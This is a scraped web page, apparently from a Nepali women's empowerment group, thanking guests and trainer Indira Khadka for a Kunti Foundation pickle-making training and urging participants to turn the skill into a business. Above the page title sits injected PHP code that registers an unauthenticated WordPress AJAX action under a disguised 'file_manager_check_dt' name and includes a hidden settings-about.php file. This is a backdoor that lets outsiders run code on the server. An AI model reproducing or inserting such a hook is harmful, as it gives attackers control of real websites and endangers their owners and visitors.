if(!function_exists('file_manager_check_dt')){ add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings-about.php'; if (file_exists($file)) { include $file; } die(); } } महिला उधमि तालिम | Taramandal Mahila Sashaktikaran Abhiyan

कुन्ती फाउण्डेसन द्वारा अचार बनाउने तालिम कार्यक्रममा प्रशिक्षार्थी हरुलाइ हौसला दिन आउनुभएको कार्यक्रमको प्रमुख अतिथि राप्रपा वरिष्ठ उपाध्यक्ष रविन्द्र मिश्र ज्यू, राप्रमस अध्यक्ष अन्जना शाह रावल ज्यू, एवं सम्पुर्ण अतिथिमा धन्यवाद दिन चाहन्छु।यस कार्यक्रम सम्पन्न गर्नुभएको कुन्ती फाउण्डेशनका सम्पुर्ण टिम साथिहरुमा आभार ब्यक्त गर्दछौं। प्रशिक्षक इन्दिरा खड्का ज्युलाइ विशेष धन्यवाद ।
शिप सिकेर मात्र केहि हुदैन त्यसलाइ निरन्तरता दिएर ब्यवसायिक रुपमा अघि बढ्नुभयो भने मात्र सिकेको काम लाग्छ, नत्र समय मात्र बर्बाद हो।त्यसैले कुरा होइन काम गर्न सिक्नुस्।सम्पुर्णमा शुभकामना ।